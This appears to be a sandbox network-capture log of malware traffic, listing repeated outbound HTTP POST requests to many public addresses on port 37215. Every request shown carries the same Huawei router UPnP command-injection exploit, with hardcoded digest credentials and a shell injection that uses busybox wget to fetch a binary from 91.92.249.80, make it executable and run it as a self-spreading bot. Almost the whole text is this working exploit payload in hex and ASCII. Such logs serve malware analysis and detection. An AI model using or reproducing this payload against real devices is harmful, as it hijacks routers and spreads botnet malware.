                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1455192.168.2.2340512197.84.107.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473711967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1456192.168.2.235044473.41.197.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473720074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1457192.168.2.2352326197.149.100.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473731995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1458192.168.2.234608841.94.91.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473736048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1459192.168.2.2352822157.139.101.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474168062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1460192.168.2.2339048197.192.83.10937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474184990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1461192.168.2.2357810157.112.201.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474186897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1462192.168.2.2356002197.8.199.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474239111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1463192.168.2.2334418197.97.79.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474301100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1464192.168.2.2355736157.209.37.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474379063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
